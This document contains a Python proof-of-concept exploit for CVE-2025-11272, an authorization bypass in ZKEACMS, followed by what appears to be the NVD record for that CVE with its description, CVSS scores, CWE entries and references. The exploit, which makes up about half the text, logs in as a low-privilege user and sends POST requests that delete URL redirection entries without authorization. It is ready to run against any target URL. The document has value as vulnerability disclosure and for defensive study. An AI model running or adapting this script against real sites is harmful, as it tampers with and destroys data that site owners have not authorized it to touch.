CVE-2025-11272

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11272 PoC - ZKEACMS UrlRedirection Delete Authorization Bypass This PoC demonstrates how a low-privilege authenticated user can delete URL redirection entries without proper authorization. """ import requests import sys TARGET_URL = "http://target-zkeacms-site.com" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit(target_url, username, password, redirect_id): session = requests.Session() # Step 1: Authenticate with low-privilege credentials login_url = f"{target_url}/Account/Login" login_data = { "UserName": username, "Password": password } resp = session.post(login_url, data=login_data) if not resp.ok: print(f"[-] Login failed: {resp.status_code}") return False print(f"[+] Logged in as: {username}") # Step 2: Send unauthorized DELETE request via POST handler delete_url = f"{target_url}/UrlRedirection/Delete" delete_data = { "ID": redirect_id } resp = session.post(delete_url, data=delete_data) if resp.status_code == 200: print(f"[+] Successfully deleted URL redirection ID: {redirect_id}") print(f"[+] Response: {resp.text[:200]}") return True else: print(f"[-] Delete request failed: {resp.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <redirect_id>") print(f"Example: {sys.argv[0]} 1") sys.exit(1) redirect_id = sys.argv[1] exploit(TARGET_URL, USERNAME, PASSWORD, redirect_id)

{"cve": {"id": "CVE-2025-11272", "sourceIdentifier": "[email protected]", "published": "2025-10-04T20:15:40.897", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in SeriaWei ZKEACMS up to 4.3. This affects the function Delete of the file src/ZKEACMS.Redirection/Controllers/UrlRedirectionController.cs of the component POST Request Handler. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/August829/YU1/issues/4", "source": "[email protected]"}, {"url": "https://github.com/August829/YU1/issues/4#issue-3420825660", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327006", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327006", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.655842", "source": "[email protected]"}]}}